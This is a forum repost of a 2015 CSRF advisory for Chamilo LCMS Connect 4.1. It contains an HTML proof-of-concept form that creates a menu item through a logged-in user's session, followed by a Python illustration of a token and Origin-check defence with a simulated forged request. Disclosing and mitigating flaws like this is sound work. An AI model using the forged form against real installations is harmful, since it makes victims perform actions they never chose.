Aerosol Posted March 28, 2015

Hi Team,

#Affected Vendor: http://lcms.chamilo.org/
#Date: 27/03/2015
#Discovered by: Joel Vadodil Varghese
#Type of vulnerability: XSRF
#Tested on: Windows 7
#Product: LCMS Connect
#Version: 4.1
#Description: Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. Chamilo LCMS is a completely new software platform for e-learning and collaboration. The application is vulnerable to XSRF attacks. If an attacker is able to lure a user into clicking a crafted link or by embedding such a link within web pages he could control the user's actions.
#Proof of Concept (PoC):
------------------------------------
<form method="POST" name="form1" action="http://localhost:80/Chamilo/index.php?application=menu&go=creator&type=core\menu\ApplicationItem">
    <input type="hidden" name="parent" value="0"/>
    <input type="hidden" name="title[de]" value=""/>
    <input type="hidden" name="title[en]" value="tester"/>
    <input type="hidden" name="title[fr]" value=""/>
    <input type="hidden" name="title[nl]" value=""/>
    <input type="hidden" name="application" value="weblcms"/>
    <input type="hidden" name="submit_button" value="Create"/>
    <input type="hidden" name="_qf__item" value=""/>
    <input type="hidden" name="type" value="core\menu\ApplicationItem"/>
</form>
------------------------------------

--
Regards,
*Joel V*
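The advisory's form works because the menu-item creation endpoint accepts any POST that arrives with the victim's session cookie, with nothing in the request that proves the form was rendered by the application itself. The usual fix is a synchronizer token (a per-session secret embedded in the legitimate form and checked on submission) backed by an Origin/Referer check. The handler below is an added illustration written for this post; it is not Chamilo code and does not reflect how the project actually patched the issue. The endpoint name, the `csrf_token` field, the `SITE_ORIGIN` value and the in-memory session dictionary are all assumptions, and the two requests at the bottom are constructed to mirror the PoC's field names.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed deployment origin; matches the host in the PoC's action URL.
SITE_ORIGIN = "http://localhost:80"


def new_session():
    """Server-side session (stands in for PHP's $_SESSION). A fresh random
    token is minted per session and never sent anywhere except inside
    pages the application itself renders."""
    return {"csrf_token": secrets.token_hex(32)}


def render_form_token(session):
    """Value a legitimate page would embed as a hidden 'csrf_token' input
    in the menu-item creation form."""
    return session["csrf_token"]


def _canonical(origin):
    """Reduce a URL/origin to (scheme, host, port) so 'http://localhost'
    and 'http://localhost:80' compare equal."""
    p = urlsplit(origin)
    port = p.port or (443 if p.scheme == "https" else 80)
    return (p.scheme, p.hostname or "", port)


def origin_allowed(headers):
    """Browsers attach an Origin header to cross-site POSTs; fall back to
    Referer, and reject when neither is present on a state-changing request."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    return _canonical(source) == _canonical(SITE_ORIGIN)


def handle_create_item(session, headers, form):
    """Hypothetical hardened handler for the endpoint the PoC targets.
    Returns (status, message)."""
    if not origin_allowed(headers):
        return 403, "cross-site request blocked (Origin/Referer mismatch)"
    submitted = form.get("csrf_token", "")
    expected = session["csrf_token"]
    # Constant-time comparison on bytes; str inputs with non-ASCII content
    # would otherwise make compare_digest raise.
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return 403, "missing or invalid CSRF token"
    title = form.get("title[en]", "")
    return 200, f"created menu item '{title}'"


# Constructed sample requests.
# 1) The shape of the advisory's PoC: the victim's session, the PoC's
#    fields, no token, and a browser-supplied Origin of the page that
#    hosted the form.
FORGED_FORM = {
    "parent": "0", "title[en]": "tester", "application": "weblcms",
    "submit_button": "Create", "_qf__item": "", "type": "core\\menu\\ApplicationItem",
}
FORGED_HEADERS = {"Origin": "http://attacker.invalid"}


def legit_request(session):
    """A submission from the application's own page carries the token."""
    form = dict(FORGED_FORM, csrf_token=render_form_token(session))
    headers = {"Origin": SITE_ORIGIN, "Referer": SITE_ORIGIN + "/Chamilo/index.php"}
    return handle_create_item(session, headers, form)


def forged_request(session):
    return handle_create_item(session, FORGED_HEADERS, FORGED_FORM)


if __name__ == "__main__":
    s = new_session()
    print(forged_request(s))   # (403, 'cross-site request blocked ...')
    print(legit_request(s))    # (200, "created menu item 'tester'")
```

Both checks are kept because each covers a gap in the other: the Origin check catches the cross-site form even when the token logic is bypassed by a later bug, and the token catches requests where a proxy or privacy extension has stripped Origin and Referer (those requests are rejected here by design; a deployment that wants to tolerate them would rely on the token alone).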